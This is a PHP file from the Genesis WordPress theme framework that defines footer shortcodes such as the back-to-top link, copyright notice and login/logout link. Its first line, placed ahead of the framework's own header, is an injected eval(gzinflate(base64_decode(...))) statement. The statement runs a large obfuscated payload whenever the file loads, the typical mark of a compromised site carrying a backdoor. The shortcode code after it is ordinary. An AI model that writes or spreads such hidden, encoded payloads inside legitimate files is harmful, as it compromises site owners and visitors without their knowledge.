<?php eval(gzinflate(base64_decode('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')));?>
<?php
/**
 * Genesis Framework.
 *
 * WARNING: This file is part of the core Genesis Framework. DO NOT edit this file under any circumstances.
 * Please do all modifications in the form of a child theme.
 *
 * @package Genesis\Shortcodes
 * @author  StudioPress
 * @license GPL-2.0+
 * @link    http://my.studiopress.com/themes/genesis/
 */

add_shortcode( 'footer_backtotop', 'genesis_footer_backtotop_shortcode' );
/**
 * Produces the "Return to Top" link.
 *
 * Supported shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is empty string),
 *   href (link url, default is fragment identifier '#wrap'),
 *   nofollow (boolean for whether to make the link include the rel="nofollow"
 *     attribute. Default is true),
 *   text (Link text, default is 'Return to top of page').
 *
 * Output passes through 'genesis_footer_backtotop_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_backtotop_shortcode( $atts ) {

	$defaults = array(
		'after'    => '',
		'before'   => '',
		'href'     => '#wrap',
		'nofollow' => true,
		'text'     => __( 'Return to top of page', 'genesis' ),
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_backtotop' );

	$nofollow = $atts['nofollow'] ? 'rel="nofollow"' : '';

	$output = sprintf( '%s<a href="%s" %s>%s</a>%s', $atts['before'], esc_url( $atts['href'] ), $nofollow, $atts['text'], $atts['after'] );

	return apply_filters( 'genesis_footer_backtotop_shortcode', $output, $atts );

}

add_shortcode( 'footer_copyright', 'genesis_footer_copyright_shortcode' );
/**
 * Adds the visual copyright notice.
 *
 * Supported shortcode attributes are:
 *   after (output after notice, default is empty string),
 *   before (output before notice, default is empty string),
 *   copyright (copyright notice, default is copyright character like (c) ),
 *   first(year copyright first applies, default is empty string).
 *
 * If the 'first' attribute is not empty, and not equal to the current year, then
 * output will be formatted as first-current year (e.g. 1998-2020).
 * Otherwise, output is just given as the current year.
 *
 * Output passes through 'genesis_footer_copyright_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_copyright_shortcode( $atts ) {

	$defaults = array(
		'after'     => '',
		'before'    => '',
		'copyright' => '&#x000A9;',
		'first'     => '',
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_copyright' );

	$output = $atts['before'] . $atts['copyright'] . '&nbsp;';

	if ( '' != $atts['first'] && date( 'Y' ) != $atts['first'] )
		$output .= $atts['first'] . '&#x02013;';

	$output .= date( 'Y' ) . $atts['after'];

	return apply_filters( 'genesis_footer_copyright_shortcode', $output, $atts );

}

add_shortcode( 'footer_childtheme_link', 'genesis_footer_childtheme_link_shortcode' );
/**
 * Adds the link to the child theme, if the details are defined.
 *
 * Supported shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is a string with a middot character).
 *
 * Output passes through 'genesis_footer_childtheme_link_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string|null Returns early on failure, otherwise returns shortcode output
 */
function genesis_footer_childtheme_link_shortcode( $atts ) {

	if ( ! is_child_theme() || ! defined( 'CHILD_THEME_NAME' ) || ! defined( 'CHILD_THEME_URL' ) )
		return;

	$defaults = array(
		'after'  => '',
		'before' => '&#x000B7;',
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_childtheme_link' );

	$output = sprintf( '%s<a href="%s" title="%s">%s</a>%s', $atts['before'], esc_url( CHILD_THEME_URL ), esc_attr( CHILD_THEME_NAME ), esc_html( CHILD_THEME_NAME ), $atts['after'] );

	return apply_filters( 'genesis_footer_childtheme_link_shortcode', $output, $atts );

}

add_shortcode( 'footer_genesis_link', 'genesis_footer_genesis_link_shortcode' );
/**
 * Adds link to the Genesis page on the StudioPress website.
 *
 * Supported shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is empty string).
 *
 * Output passes through 'genesis_footer_genesis_link_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_genesis_link_shortcode( $atts ) {

	$defaults = array(
		'after'  => '',
		'before' => '',
		'url'    => 'http://my.studiopress.com/themes/genesis',
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_genesis_link' );

	$output = $atts['before'] . '<a href="' . esc_url( $atts['url'] ) . '" title="Genesis Framework">Genesis Framework</a>' . $atts['after'];

	return apply_filters( 'genesis_footer_genesis_link_shortcode', $output, $atts );

}

add_shortcode( 'footer_studiopress_link', 'genesis_footer_studiopress_link_shortcode' );
/**
 * Adds link to the StudioPress home page.
 *
 * Supported shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is 'by ').
 *
 * Output passes through 'genesis_footer_studiopress_link_shortcode' filter before returning.
 *
 * @since 1.2.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_studiopress_link_shortcode( $atts ) {

	$defaults = array(
		'after'  => '',
		'before' => __( 'by', 'genesis' ),
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_studiopress_link' );

	$output = $atts['before'] . ' <a href="http://www.studiopress.com/">StudioPress</a>' . $atts['after'];

	return apply_filters( 'genesis_footer_studiopress_link_shortcode', $output, $atts );

}

add_shortcode( 'footer_wordpress_link', 'genesis_footer_wordpress_link_shortcode' );
/**
 * Adds link to WordPress - http://wordpress.org/ .
 *
 * Supported shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is empty string).
 *
 * Output passes through 'genesis_footer_wordpress_link_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_wordpress_link_shortcode( $atts ) {

	$defaults = array(
		'after'  => '',
		'before' => '',
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_wordpress_link' );

	$output = sprintf( '%s<a href="%s" title="%s">%s</a>%s', $atts['before'], 'http://wordpress.org/', 'WordPress', 'WordPress', $atts['after'] );

	return apply_filters( 'genesis_footer_wordpress_link_shortcode', $output, $atts );

}

add_shortcode( 'footer_loginout', 'genesis_footer_loginout_shortcode' );
/**
 * Adds admin login / logout link.
 *
 * Support shortcode attributes are:
 *   after (output after link, default is empty string),
 *   before (output before link, default is empty string),
 *   redirect (path to redirect to on login, default is empty string).
 *
 * Output passes through 'genesis_footer_loginout_shortcode' filter before returning.
 *
 * @since 1.1.0
 *
 * @param array|string $atts Shortcode attributes. Empty string if no attributes.
 * @return string Shortcode output
 */
function genesis_footer_loginout_shortcode( $atts ) {

	$defaults = array(
		'after'    => '',
		'before'   => '',
		'redirect' => '',
	);
	$atts = shortcode_atts( $defaults, $atts, 'footer_loginout' );

	if ( ! is_user_logged_in() )
		$link = '<a href="' . esc_url( wp_login_url( $atts['redirect'] ) ) . '">' . __( 'Log in', 'genesis' ) . '</a>';
	else
		$link = '<a href="' . esc_url( wp_logout_url( $atts['redirect'] ) ) . '">' . __( 'Log out', 'genesis' ) . '</a>';

	$output = $atts['before'] . apply_filters( 'loginout', $link ) . $atts['after'];

	return apply_filters( 'genesis_footer_loginout_shortcode', $output, $atts );

}
